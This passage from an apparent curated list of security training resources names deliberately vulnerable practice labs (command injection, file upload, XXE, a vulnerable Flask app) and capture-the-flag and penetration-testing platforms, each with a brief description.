  • Commix-testbed - A collection of web pages, vulnerable to command injection flaws
  • File-Upload-Lab - Damn Vulnerable File Upload V 1.1
  • Upload-labs - A summary of all types of uploading vulnerabilities for you
  • XXE-Lab - A XXE vulnerability Demo containing language versions such as PHP, Java, python, C#, etc
  • Vulnerable-Flask-App - Erlik2 Vulnerable-Flask-App provided by anil-yelken.

CTF challenges

  • Vulnhub - VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration
  • TryHackMe - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
  • Hackthebox - Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills.
  • Root Me - Root Me allows everyone to test and improve their knowledge in computer security and hacking.
  • Pentestit - Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills
  • Pentesterlab - Learn Web Penetration Testing: The Right Way
  • Cyberseclabs - At CyberSecLabs, we aim to provide secure, high-quality training services that allow information security students the opportunity to safely learn and practice penetration testing skills.
  • Web Security Academy - Free, online web security training from the creators of Burp Suite
  • Vulnmachines - A place to learn and improve penetration testing/ethical hacking skills for FREE